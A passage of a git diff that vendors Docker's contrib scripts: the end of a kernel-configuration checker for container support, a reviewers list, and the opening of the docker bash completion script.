"$@" + echo -n "$text" + color reset + echo +} + +wrap_good() { + echo "$(wrap_color "$1" white): $(wrap_color "$2" green)" +} +wrap_bad() { + echo "$(wrap_color "$1" bold): $(wrap_color "$2" bold red)" +} +wrap_warning() { + wrap_color >&2 "$*" red +} + +check_flag() { + if is_set_in_kernel "$1"; then + wrap_good "CONFIG_$1" 'enabled' + elif is_set_as_module "$1"; then + wrap_good "CONFIG_$1" 'enabled (as module)' + else + wrap_bad "CONFIG_$1" 'missing' + EXITCODE=1 + fi +} + +check_flags() { + for flag in "$@"; do + echo -n "- "; check_flag "$flag" + done +} + +check_command() { + if command -v "$1" >/dev/null 2>&1; then + wrap_good "$1 command" 'available' + else + wrap_bad "$1 command" 'missing' + EXITCODE=1 + fi +} + +check_device() { + if [ -c "$1" ]; then + wrap_good "$1" 'present' + else + wrap_bad "$1" 'missing' + EXITCODE=1 + fi +} + +check_distro_userns() { + source /etc/os-release 2>/dev/null || /bin/true + if [[ "${ID}" =~ ^(centos|rhel)$ && "${VERSION_ID}" =~ ^7 ]]; then + # this is a 
CentOS7 or RHEL7 system + grep -q "user_namespace.enable=1" /proc/cmdline || { + # no user namespace support enabled + wrap_bad " (RHEL7/CentOS7" "User namespaces disabled; add 'user_namespace.enable=1' to boot command line)" + EXITCODE=1 + } + fi +} + +if [ ! -e "$CONFIG" ]; then + wrap_warning "warning: $CONFIG does not exist, searching other paths for kernel config ..." + for tryConfig in "${possibleConfigs[@]}"; do + if [ -e "$tryConfig" ]; then + CONFIG="$tryConfig" + break + fi + done + if [ ! -e "$CONFIG" ]; then + wrap_warning "error: cannot find kernel config" + wrap_warning " try running this script again, specifying the kernel config:" + wrap_warning " CONFIG=/path/to/kernel/.config $0 or $0 /path/to/kernel/.config" + exit 1 + fi +fi + +wrap_color "info: reading kernel config from $CONFIG ..." white +echo + +echo 'Generally Necessary:' + +echo -n '- ' +cgroupSubsystemDir="$(awk '/[, ](cpu|cpuacct|cpuset|devices|freezer|memory)[, ]/ && $3 == "cgroup" { print $2 }' /proc/mounts | head -n1)" +cgroupDir="$(dirname "$cgroupSubsystemDir")" +if [ -d "$cgroupDir/cpu" -o -d "$cgroupDir/cpuacct" -o -d "$cgroupDir/cpuset" -o -d "$cgroupDir/devices" -o -d "$cgroupDir/freezer" -o -d "$cgroupDir/memory" ]; then + echo "$(wrap_good 'cgroup hierarchy' 'properly mounted') [$cgroupDir]" +else + if [ "$cgroupSubsystemDir" ]; then + echo "$(wrap_bad 'cgroup hierarchy' 'single mountpoint!') [$cgroupSubsystemDir]" + else + echo "$(wrap_bad 'cgroup hierarchy' 'nonexistent??')" + fi + EXITCODE=1 + echo " $(wrap_color '(see https://github.com/tianon/cgroupfs-mount)' yellow)" +fi + +if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then + echo -n '- ' + if command -v apparmor_parser &> /dev/null; then + echo "$(wrap_good 'apparmor' 'enabled and tools installed')" + else + echo "$(wrap_bad 'apparmor' 'enabled, but apparmor_parser missing')" + echo -n ' ' + if command -v apt-get &> /dev/null; then + echo "$(wrap_color '(use "apt-get install apparmor" to fix 
this)')" + elif command -v yum &> /dev/null; then + echo "$(wrap_color '(your best bet is "yum install apparmor-parser")')" + else + echo "$(wrap_color '(look for an "apparmor" package for your distribution)')" + fi + EXITCODE=1 + fi +fi + +flags=( + NAMESPACES {NET,PID,IPC,UTS}_NS + CGROUPS CGROUP_CPUACCT CGROUP_DEVICE CGROUP_FREEZER CGROUP_SCHED CPUSETS MEMCG + KEYS + VETH BRIDGE BRIDGE_NETFILTER + NF_NAT_IPV4 IP_NF_FILTER IP_NF_TARGET_MASQUERADE + NETFILTER_XT_MATCH_{ADDRTYPE,CONNTRACK,IPVS} + IP_NF_NAT NF_NAT NF_NAT_NEEDED + + # required for bind-mounting /dev/mqueue into containers + POSIX_MQUEUE +) +check_flags "${flags[@]}" +if [ "$kernelMajor" -lt 4 ] || [ "$kernelMajor" -eq 4 -a "$kernelMinor" -lt 8 ]; then + check_flags DEVPTS_MULTIPLE_INSTANCES +fi + +echo + +echo 'Optional Features:' +{ + check_flags USER_NS + check_distro_userns +} +{ + check_flags SECCOMP +} +{ + check_flags CGROUP_PIDS +} +{ + check_flags MEMCG_SWAP MEMCG_SWAP_ENABLED + if is_set MEMCG_SWAP && ! is_set MEMCG_SWAP_ENABLED; then + echo " $(wrap_color '(note that cgroup swap accounting is not enabled in your kernel config, you can enable it by setting boot option "swapaccount=1")' bold black)" + fi +} +{ + if is_set LEGACY_VSYSCALL_NATIVE; then + echo -n "- "; wrap_bad "CONFIG_LEGACY_VSYSCALL_NATIVE" 'enabled' + echo " $(wrap_color '(dangerous, provides an ASLR-bypassing target with usable ROP gadgets.)' bold black)" + elif is_set LEGACY_VSYSCALL_EMULATE; then + echo -n "- "; wrap_good "CONFIG_LEGACY_VSYSCALL_EMULATE" 'enabled' + elif is_set LEGACY_VSYSCALL_NONE; then + echo -n "- "; wrap_bad "CONFIG_LEGACY_VSYSCALL_NONE" 'enabled' + echo " $(wrap_color '(containers using eglibc <= 2.13 will not work. Switch to' bold black)" + echo " $(wrap_color ' "CONFIG_VSYSCALL_[NATIVE|EMULATE]" or use "vsyscall=[native|emulate]"' bold black)" + echo " $(wrap_color ' on kernel command line. 
Note that this will disable ASLR for the,' bold black)" + echo " $(wrap_color ' VDSO which may assist in exploiting security vulnerabilities.)' bold black)" + # else Older kernels (prior to 3dc33bd30f3e, released in v4.40-rc1) do + # not have these LEGACY_VSYSCALL options and are effectively + # LEGACY_VSYSCALL_EMULATE. Even older kernels are presumably + # effectively LEGACY_VSYSCALL_NATIVE. + fi +} + +if [ "$kernelMajor" -lt 4 ] || [ "$kernelMajor" -eq 4 -a "$kernelMinor" -le 5 ]; then + check_flags MEMCG_KMEM +fi + +if [ "$kernelMajor" -lt 3 ] || [ "$kernelMajor" -eq 3 -a "$kernelMinor" -le 18 ]; then + check_flags RESOURCE_COUNTERS +fi + +if [ "$kernelMajor" -lt 3 ] || [ "$kernelMajor" -eq 3 -a "$kernelMinor" -le 13 ]; then + netprio=NETPRIO_CGROUP +else + netprio=CGROUP_NET_PRIO +fi + +flags=( + BLK_CGROUP BLK_DEV_THROTTLING IOSCHED_CFQ CFQ_GROUP_IOSCHED + CGROUP_PERF + CGROUP_HUGETLB + NET_CLS_CGROUP $netprio + CFS_BANDWIDTH FAIR_GROUP_SCHED RT_GROUP_SCHED + IP_VS + IP_VS_NFCT + IP_VS_RR +) +check_flags "${flags[@]}" + +if ! is_set EXT4_USE_FOR_EXT2; then + check_flags EXT3_FS EXT3_FS_XATTR EXT3_FS_POSIX_ACL EXT3_FS_SECURITY + if ! is_set EXT3_FS || ! is_set EXT3_FS_XATTR || ! is_set EXT3_FS_POSIX_ACL || ! is_set EXT3_FS_SECURITY; then + echo " $(wrap_color '(enable these ext3 configs if you are using ext3 as backing filesystem)' bold black)" + fi +fi + +check_flags EXT4_FS EXT4_FS_POSIX_ACL EXT4_FS_SECURITY +if ! is_set EXT4_FS || ! is_set EXT4_FS_POSIX_ACL || ! 
is_set EXT4_FS_SECURITY; then + if is_set EXT4_USE_FOR_EXT2; then + echo " $(wrap_color 'enable these ext4 configs if you are using ext3 or ext4 as backing filesystem' bold black)" + else + echo " $(wrap_color 'enable these ext4 configs if you are using ext4 as backing filesystem' bold black)" + fi +fi + +echo '- Network Drivers:' +echo ' - "'$(wrap_color 'overlay' blue)'":' +check_flags VXLAN | sed 's/^/ /' +echo ' Optional (for encrypted networks):' +check_flags CRYPTO CRYPTO_AEAD CRYPTO_GCM CRYPTO_SEQIV CRYPTO_GHASH \ + XFRM XFRM_USER XFRM_ALGO INET_ESP INET_XFRM_MODE_TRANSPORT | sed 's/^/ /' +echo ' - "'$(wrap_color 'ipvlan' blue)'":' +check_flags IPVLAN | sed 's/^/ /' +echo ' - "'$(wrap_color 'macvlan' blue)'":' +check_flags MACVLAN DUMMY | sed 's/^/ /' + +# only fail if no storage drivers available +CODE=${EXITCODE} +EXITCODE=0 +STORAGE=1 + +echo '- Storage Drivers:' +echo ' - "'$(wrap_color 'aufs' blue)'":' +check_flags AUFS_FS | sed 's/^/ /' +if ! is_set AUFS_FS && grep -q aufs /proc/filesystems; then + echo " $(wrap_color '(note that some kernels include AUFS patches but not the AUFS_FS flag)' bold black)" +fi +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +echo ' - "'$(wrap_color 'btrfs' blue)'":' +check_flags BTRFS_FS | sed 's/^/ /' +check_flags BTRFS_FS_POSIX_ACL | sed 's/^/ /' +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +echo ' - "'$(wrap_color 'devicemapper' blue)'":' +check_flags BLK_DEV_DM DM_THIN_PROVISIONING | sed 's/^/ /' +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +echo ' - "'$(wrap_color 'overlay' blue)'":' +check_flags OVERLAY_FS | sed 's/^/ /' +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +echo ' - "'$(wrap_color 'zfs' blue)'":' +echo -n " - "; check_device /dev/zfs +echo -n " - "; check_command zfs +echo -n " - "; check_command zpool +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +EXITCODE=$CODE +[ "$STORAGE" = 1 ] && EXITCODE=1 + +echo + +check_limit_over() +{ + if [ $(cat "$1") -le "$2" ]; then + wrap_bad "- $1" "$(cat $1)" + 
wrap_color " This should be set to at least $2, for example set: sysctl -w kernel/keys/root_maxkeys=1000000" bold black + EXITCODE=1 + else + wrap_good "- $1" "$(cat $1)" + fi +} + +echo 'Limits:' +check_limit_over /proc/sys/kernel/keys/root_maxkeys 10000 +echo + +exit $EXITCODE diff --git a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS new file mode 100644 index 0000000000..03ee2dde3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS @@ -0,0 +1,2 @@ +Tianon Gravi (@tianon) +Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/completion/bash/docker b/vendor/github.com/docker/docker/contrib/completion/bash/docker new file mode 100644 index 0000000000..7ea5d9a9f4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/bash/docker @@ -0,0 +1,4282 @@ +#!/bin/bash +# +# bash completion file for core docker commands +# +# This script provides completion of: +# - commands and their options +# - container ids and names +# - image repos and tags +# - filepaths +# +# To enable the completions either: +# - place this file in /etc/bash_completion.d +# or +# - copy this file to e.g. ~/.docker-completion.sh and add the line +# below to your .bashrc after bash completion features are loaded +# . ~/.docker-completion.sh +# +# Configuration: +# +# For several commands, the amount of completions can be configured by +# setting environment variables. 
+# +# DOCKER_COMPLETION_SHOW_CONTAINER_IDS +# DOCKER_COMPLETION_SHOW_NETWORK_IDS +# DOCKER_COMPLETION_SHOW_NODE_IDS +# DOCKER_COMPLETION_SHOW_PLUGIN_IDS +# DOCKER_COMPLETION_SHOW_SECRET_IDS +# DOCKER_COMPLETION_SHOW_SERVICE_IDS +# "no" - Show names only (default) +# "yes" - Show names and ids +# +# You can tailor completion for the "events", "history", "inspect", "run", +# "rmi" and "save" commands by settings the following environment +# variables: +# +# DOCKER_COMPLETION_SHOW_IMAGE_IDS +# "none" - Show names only (default) +# "non-intermediate" - Show names and ids, but omit intermediate image IDs +# "all" - Show names and ids, including intermediate image IDs +# +# DOCKER_COMPLETION_SHOW_TAGS +# "yes" - include tags in completion options (default) +# "no" - don't include tags in completion options + +# +# Note: +# Currently, the completions will not work if the docker daemon is not +# bound to the default communication port/socket +# If the docker daemon is using a unix socket for communication your user +# must have access to the socket for the completions to function correctly +# +# Note for developers: +# Please arrange options sorted alphabetically by long name with the short +# options immediately following their corresponding long form. +# This order should be applied to lists, alternatives and code blocks. + +__docker_previous_extglob_setting=$(shopt -p extglob) +shopt -s extglob + +__docker_q() { + docker ${host:+-H "$host"} ${config:+--config "$config"} 2>/dev/null "$@" +} + +# __docker_containers returns a list of containers. Additional options to +# `docker ps` may be specified in order to filter the list, e.g. +# `__docker_containers --filter status=running` +# By default, only names are returned. +# Set DOCKER_COMPLETION_SHOW_CONTAINER_IDS=yes to also complete IDs. +# An optional first option `--id|--name` may be used to limit the +# output to the IDs or names of matching items. This setting takes +# precedence over the environment setting. 
+__docker_containers() { + local format + if [ "$1" = "--id" ] ; then + format='{{.ID}}' + shift + elif [ "$1" = "--name" ] ; then + format='{{.Names}}' + shift + elif [ "${DOCKER_COMPLETION_SHOW_CONTAINER_IDS}" = yes ] ; then + format='{{.ID}} {{.Names}}' + else + format='{{.Names}}' + fi + __docker_q ps --format "$format" "$@" +} + +# __docker_complete_containers applies completion of containers based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_containers`. +__docker_complete_containers() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_containers "$@")" -- "$current") ) +} + +__docker_complete_containers_all() { + __docker_complete_containers "$@" --all +} + +__docker_complete_containers_running() { + __docker_complete_containers "$@" --filter status=running +} + +__docker_complete_containers_stopped() { + __docker_complete_containers "$@" --filter status=exited +} + +__docker_complete_containers_unpauseable() { + __docker_complete_containers "$@" --filter status=paused +} + +__docker_complete_container_names() { + local containers=( $(__docker_q ps -aq --no-trunc) ) + local names=( $(__docker_q inspect --format '{{.Name}}' "${containers[@]}") ) + names=( "${names[@]#/}" ) # trim off the leading "/" from the container names + COMPREPLY=( $(compgen -W "${names[*]}" -- "$cur") ) +} + +__docker_complete_container_ids() { + local containers=( $(__docker_q ps -aq) ) + COMPREPLY=( $(compgen -W "${containers[*]}" -- "$cur") ) +} + +__docker_images() { + local images_args="" + + case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in + all) + images_args="--no-trunc -a" + ;; + non-intermediate) + images_args="--no-trunc" + ;; + esac + + local repo_print_command + if [ "${DOCKER_COMPLETION_SHOW_TAGS:-yes}" = "yes" ]; then + repo_print_command='print $1; print $1":"$2' + else + repo_print_command='print $1' 
+ fi + + local awk_script + case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in + all|non-intermediate) + awk_script='NR>1 { print $3; if ($1 != "") { '"$repo_print_command"' } }' + ;; + none|*) + awk_script='NR>1 && $1 != "" { '"$repo_print_command"' }' + ;; + esac + + __docker_q images $images_args | awk "$awk_script" | grep -v '$' +} + +__docker_complete_images() { + COMPREPLY=( $(compgen -W "$(__docker_images)" -- "$cur") ) + __ltrim_colon_completions "$cur" +} + +__docker_complete_image_repos() { + local repos="$(__docker_q images | awk 'NR>1 && $1 != "" { print $1 }')" + COMPREPLY=( $(compgen -W "$repos" -- "$cur") ) +} + +__docker_complete_image_repos_and_tags() { + local reposAndTags="$(__docker_q images | awk 'NR>1 && $1 != "" { print $1; print $1":"$2 }')" + COMPREPLY=( $(compgen -W "$reposAndTags" -- "$cur") ) + __ltrim_colon_completions "$cur" +} + +# __docker_networks returns a list of all networks. Additional options to +# `docker network ls` may be specified in order to filter the list, e.g. +# `__docker_networks --filter type=custom` +# By default, only names are returned. +# Set DOCKER_COMPLETION_SHOW_NETWORK_IDS=yes to also complete IDs. +# An optional first option `--id|--name` may be used to limit the +# output to the IDs or names of matching items. This setting takes +# precedence over the environment setting. +__docker_networks() { + local format + if [ "$1" = "--id" ] ; then + format='{{.ID}}' + shift + elif [ "$1" = "--name" ] ; then + format='{{.Name}}' + shift + elif [ "${DOCKER_COMPLETION_SHOW_NETWORK_IDS}" = yes ] ; then + format='{{.ID}} {{.Name}}' + else + format='{{.Name}}' + fi + __docker_q network ls --format "$format" "$@" +} + +# __docker_complete_networks applies completion of networks based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_networks`. 
+__docker_complete_networks() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_networks "$@")" -- "$current") ) +} + +__docker_complete_containers_in_network() { + local containers=$(__docker_q network inspect -f '{{range $i, $c := .Containers}}{{$i}} {{$c.Name}} {{end}}' "$1") + COMPREPLY=( $(compgen -W "$containers" -- "$cur") ) +} + +# __docker_volumes returns a list of all volumes. Additional options to +# `docker volume ls` may be specified in order to filter the list, e.g. +# `__docker_volumes --filter dangling=true` +# Because volumes do not have IDs, this function does not distinguish between +# IDs and names. +__docker_volumes() { + __docker_q volume ls -q "$@" +} + +# __docker_complete_volumes applies completion of volumes based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_volumes`. +__docker_complete_volumes() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_volumes "$@")" -- "$current") ) +} + +# __docker_plugins_bundled returns a list of all plugins of a given type. +# The type has to be specified with the mandatory option `--type`. +# Valid types are: Network, Volume, Authorization. +# Completions may be added or removed with `--add` and `--remove` +# This function only deals with plugins that come bundled with Docker. +# For plugins managed by `docker plugin`, see `__docker_plugins_installed`. 
+__docker_plugins_bundled() {
+	local type add=() remove=()
+	while true ; do
+		case "$1" in
+			--type)
+				type="$2"
+				shift 2
+				;;
+			--add)
+				add+=("$2")
+				shift 2
+				;;
+			--remove)
+				remove+=("$2")
+				shift 2
+				;;
+			*)
+				break
+				;;
+		esac
+	done
+
+	local plugins=($(__docker_q info | sed -n "/^Plugins/,/^[^ ]/s/ $type: //p"))
+	for del in "${remove[@]}" ; do
+		plugins=(${plugins[@]/$del/})
+	done
+	echo "${plugins[@]} ${add[@]}"
+}
+
+# __docker_complete_plugins_bundled applies completion of plugins based on the current
+# value of `$cur` or the value of the optional first option `--cur`, if given.
+# The plugin type has to be specified with the next option `--type`.
+# This function only deals with plugins that come bundled with Docker.
+# For completion of plugins managed by `docker plugin`, see
+# `__docker_complete_plugins_installed`.
+__docker_complete_plugins_bundled() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_plugins_bundled "$@")" -- "$current") )
+}
+
+# __docker_plugins_installed returns a list of all plugins that were installed with
+# the Docker plugin API.
+# By default, only names are returned.
+# Set DOCKER_COMPLETION_SHOW_PLUGIN_IDS=yes to also complete IDs.
+# For built-in plugins, see `__docker_plugins_bundled`.
+__docker_plugins_installed() {
+	local fields
+	if [ "$DOCKER_COMPLETION_SHOW_PLUGIN_IDS" = yes ] ; then
+		fields='$1,$2'
+	else
+		fields='$2'
+	fi
+	__docker_q plugin ls | awk "NR>1 {print $fields}"
+}
+
+# __docker_complete_plugins_installed applies completion of plugins that were installed
+# with the Docker plugin API, based on the current value of `$cur` or the value of
+# the optional first option `--cur`, if given.
+# For completion of built-in plugins, see `__docker_complete_plugins_bundled`.
+__docker_complete_plugins_installed() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_plugins_installed "$@")" -- "$current") ) +} + +__docker_runtimes() { + __docker_q info | sed -n 's/^Runtimes: \(.*\)/\1/p' +} + +__docker_complete_runtimes() { + COMPREPLY=( $(compgen -W "$(__docker_runtimes)" -- "$cur") ) +} + +# __docker_secrets returns a list of all secrets. +# By default, only names of secrets are returned. +# Set DOCKER_COMPLETION_SHOW_SECRET_IDS=yes to also complete IDs of secrets. +__docker_secrets() { + local fields='$2' # default: name only + [ "${DOCKER_COMPLETION_SHOW_SECRET_IDS}" = yes ] && fields='$1,$2' # ID and name + + __docker_q secret ls | awk "NR>1 {print $fields}" +} + +# __docker_complete_secrets applies completion of secrets based on the current value +# of `$cur`. +__docker_complete_secrets() { + COMPREPLY=( $(compgen -W "$(__docker_secrets)" -- "$cur") ) +} + +# __docker_stacks returns a list of all stacks. +__docker_stacks() { + __docker_q stack ls | awk 'NR>1 {print $1}' +} + +# __docker_complete_stacks applies completion of stacks based on the current value +# of `$cur` or the value of the optional first option `--cur`, if given. +__docker_complete_stacks() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_stacks "$@")" -- "$current") ) +} + +# __docker_nodes returns a list of all nodes. Additional options to +# `docker node ls` may be specified in order to filter the list, e.g. +# `__docker_nodes --filter role=manager` +# By default, only node names are returned. +# Set DOCKER_COMPLETION_SHOW_NODE_IDS=yes to also complete node IDs. +# An optional first option `--id|--name` may be used to limit the +# output to the IDs or names of matching items. This setting takes +# precedence over the environment setting. +# Completions may be added with `--add`, e.g. `--add self`. 
+__docker_nodes() { + local add=() + local fields='$2' # default: node name only + [ "${DOCKER_COMPLETION_SHOW_NODE_IDS}" = yes ] && fields='$1,$2' # ID and name + + while true ; do + case "$1" in + --id) + fields='$1' # IDs only + shift + ;; + --name) + fields='$2' # names only + shift + ;; + --add) + add+=("$2") + shift 2 + ;; + *) + break + ;; + esac + done + + echo $(__docker_q node ls "$@" | tr -d '*' | awk "NR>1 {print $fields}") "${add[@]}" +} + +# __docker_complete_nodes applies completion of nodes based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_nodes`. +__docker_complete_nodes() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_nodes "$@")" -- "$current") ) +} + +__docker_complete_nodes_plus_self() { + __docker_complete_nodes --add self "$@" +} + +# __docker_services returns a list of all services. Additional options to +# `docker service ls` may be specified in order to filter the list, e.g. +# `__docker_services --filter name=xxx` +# By default, only node names are returned. +# Set DOCKER_COMPLETION_SHOW_SERVICE_IDS=yes to also complete IDs. +# An optional first option `--id|--name` may be used to limit the +# output to the IDs or names of matching items. This setting takes +# precedence over the environment setting. +__docker_services() { + local fields='$2' # default: service name only + [ "${DOCKER_COMPLETION_SHOW_SERVICE_IDS}" = yes ] && fields='$1,$2' # ID & name + + if [ "$1" = "--id" ] ; then + fields='$1' # IDs only + shift + elif [ "$1" = "--name" ] ; then + fields='$2' # names only + shift + fi + __docker_q service ls "$@" | awk "NR>1 {print $fields}" +} + +# __docker_complete_services applies completion of services based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. 
+# Additional filters may be appended, see `__docker_services`. +__docker_complete_services() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_services "$@")" -- "$current") ) +} + +# __docker_append_to_completions appends the word passed as an argument to every +# word in `$COMPREPLY`. +# Normally you do this with `compgen -S` while generating the completions. +# This function allows you to append a suffix later. It allows you to use +# the __docker_complete_XXX functions in cases where you need a suffix. +__docker_append_to_completions() { + COMPREPLY=( ${COMPREPLY[@]/%/"$1"} ) +} + +# __docker_is_experimental tests whether the currently configured Docker daemon +# runs in experimental mode. If so, the function exits with 0 (true). +# Otherwise, or if the result cannot be determined, the exit value is 1 (false). +__docker_is_experimental() { + [ "$(__docker_q version -f '{{.Server.Experimental}}')" = "true" ] +} + +# __docker_pos_first_nonflag finds the position of the first word that is neither +# option nor an option's argument. If there are options that require arguments, +# you should pass a glob describing those options, e.g. "--option1|-o|--option2" +# Use this function to restrict completions to exact positions after the argument list. 
+__docker_pos_first_nonflag() { + local argument_flags=$1 + + local counter=$((${subcommand_pos:-${command_pos}} + 1)) + while [ $counter -le $cword ]; do + if [ -n "$argument_flags" ] && eval "case '${words[$counter]}' in $argument_flags) true ;; *) false ;; esac"; then + (( counter++ )) + # eat "=" in case of --option=arg syntax + [ "${words[$counter]}" = "=" ] && (( counter++ )) + else + case "${words[$counter]}" in + -*) + ;; + *) + break + ;; + esac + fi + + # Bash splits words at "=", retaining "=" as a word, examples: + # "--debug=false" => 3 words, "--log-opt syslog-facility=daemon" => 4 words + while [ "${words[$counter + 1]}" = "=" ] ; do + counter=$(( counter + 2)) + done + + (( counter++ )) + done + + echo $counter +} + +# __docker_map_key_of_current_option returns `key` if we are currently completing the +# value of a map option (`key=value`) which matches the extglob given as an argument. +# This function is needed for key-specific completions. +__docker_map_key_of_current_option() { + local glob="$1" + + local key glob_pos + if [ "$cur" = "=" ] ; then # key= case + key="$prev" + glob_pos=$((cword - 2)) + elif [[ $cur == *=* ]] ; then # key=value case (OSX) + key=${cur%=*} + glob_pos=$((cword - 1)) + elif [ "$prev" = "=" ] ; then + key=${words[$cword - 2]} # key=value case + glob_pos=$((cword - 3)) + else + return + fi + + [ "${words[$glob_pos]}" = "=" ] && ((glob_pos--)) # --option=key=value syntax + + [[ ${words[$glob_pos]} == @($glob) ]] && echo "$key" +} + +# __docker_value_of_option returns the value of the first option matching `option_glob`. +# Valid values for `option_glob` are option names like `--log-level` and globs like +# `--log-level|-l` +# Only positions between the command and the current word are considered. 
+__docker_value_of_option() {
+	local option_extglob=$(__docker_to_extglob "$1")
+
+	local counter=$((command_pos + 1))
+	while [ $counter -lt $cword ]; do
+		case ${words[$counter]} in
+			$option_extglob )
+				echo ${words[$counter + 1]}
+				break
+				;;
+		esac
+		(( counter++ ))
+	done
+}
+
+# __docker_to_alternatives transforms a multiline list of strings into a single line
+# string with the words separated by `|`.
+# This is used to prepare arguments to __docker_pos_first_nonflag().
+__docker_to_alternatives() {
+	local parts=( $1 )
+	local IFS='|'
+	echo "${parts[*]}"
+}
+
+# __docker_to_extglob transforms a multiline list of options into an extglob pattern
+# suitable for use in case statements.
+__docker_to_extglob() {
+	local extglob=$( __docker_to_alternatives "$1" )
+	echo "@($extglob)"
+}
+
+# __docker_subcommands processes subcommands
+# Locates the first occurrence of any of the subcommands contained in the
+# first argument. In case of a match, calls the corresponding completion
+# function and returns 0.
+# If no match is found, 1 is returned. The calling function can then
+# continue processing its completion.
+#
+# TODO if the preceding command has options that accept arguments and an
+# argument is equal to one of the subcommands, this is falsely detected as
+# a match.
+__docker_subcommands() { + local subcommands="$1" + + local counter=$(($command_pos + 1)) + while [ $counter -lt $cword ]; do + case "${words[$counter]}" in + $(__docker_to_extglob "$subcommands") ) + subcommand_pos=$counter + local subcommand=${words[$counter]} + local completions_func=_docker_${command}_${subcommand} + declare -F $completions_func >/dev/null && $completions_func + return 0 + ;; + esac + (( counter++ )) + done + return 1 +} + +# __docker_nospace suppresses trailing whitespace +__docker_nospace() { + # compopt is not available in ancient bash versions + type compopt &>/dev/null && compopt -o nospace +} + +__docker_complete_resolved_hostname() { + command -v host >/dev/null 2>&1 || return + COMPREPLY=( $(host 2>/dev/null "${cur%:}" | awk '/has address/ {print $4}') ) +} + +__docker_local_interfaces() { + command -v ip >/dev/null 2>&1 || return + ip addr show scope global 2>/dev/null | sed -n 's| \+inet \([0-9.]\+\).* \([^ ]\+\)|\1 \2|p' +} + +__docker_complete_local_interfaces() { + local additional_interface + if [ "$1" = "--add" ] ; then + additional_interface="$2" + fi + + COMPREPLY=( $( compgen -W "$(__docker_local_interfaces) $additional_interface" -- "$cur" ) ) +} + +__docker_complete_capabilities() { + # The list of capabilities is defined in types.go, ALL was added manually. 
+ COMPREPLY=( $( compgen -W " + ALL + AUDIT_CONTROL + AUDIT_WRITE + AUDIT_READ + BLOCK_SUSPEND + CHOWN + DAC_OVERRIDE + DAC_READ_SEARCH + FOWNER + FSETID + IPC_LOCK + IPC_OWNER + KILL + LEASE + LINUX_IMMUTABLE + MAC_ADMIN + MAC_OVERRIDE + MKNOD + NET_ADMIN + NET_BIND_SERVICE + NET_BROADCAST + NET_RAW + SETFCAP + SETGID + SETPCAP + SETUID + SYS_ADMIN + SYS_BOOT + SYS_CHROOT + SYSLOG + SYS_MODULE + SYS_NICE + SYS_PACCT + SYS_PTRACE + SYS_RAWIO + SYS_RESOURCE + SYS_TIME + SYS_TTY_CONFIG + WAKE_ALARM + " -- "$cur" ) ) +} + +__docker_complete_detach-keys() { + case "$prev" in + --detach-keys) + case "$cur" in + *,) + COMPREPLY=( $( compgen -W "${cur}ctrl-" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "ctrl-" -- "$cur" ) ) + ;; + esac + + __docker_nospace + return + ;; + esac + return 1 +} + +__docker_complete_isolation() { + COMPREPLY=( $( compgen -W "default hyperv process" -- "$cur" ) ) +} + +__docker_complete_log_drivers() { + COMPREPLY=( $( compgen -W " + awslogs + etwlogs + fluentd + gcplogs + gelf + journald + json-file + logentries + none + splunk + syslog + " -- "$cur" ) ) +} + +__docker_complete_log_options() { + # see docs/reference/logging/index.md + local awslogs_options="awslogs-region awslogs-group awslogs-stream" + local fluentd_options="env fluentd-address fluentd-async-connect fluentd-buffer-limit fluentd-retry-wait fluentd-max-retries labels tag" + local gcplogs_options="env gcp-log-cmd gcp-project labels" + local gelf_options="env gelf-address gelf-compression-level gelf-compression-type labels tag" + local journald_options="env labels tag" + local json_file_options="env labels max-file max-size" + local logentries_options="logentries-token" + local syslog_options="env labels syslog-address syslog-facility syslog-format syslog-tls-ca-cert syslog-tls-cert syslog-tls-key syslog-tls-skip-verify tag" + local splunk_options="env labels splunk-caname splunk-capath splunk-format splunk-gzip splunk-gzip-level splunk-index splunk-insecureskipverify 
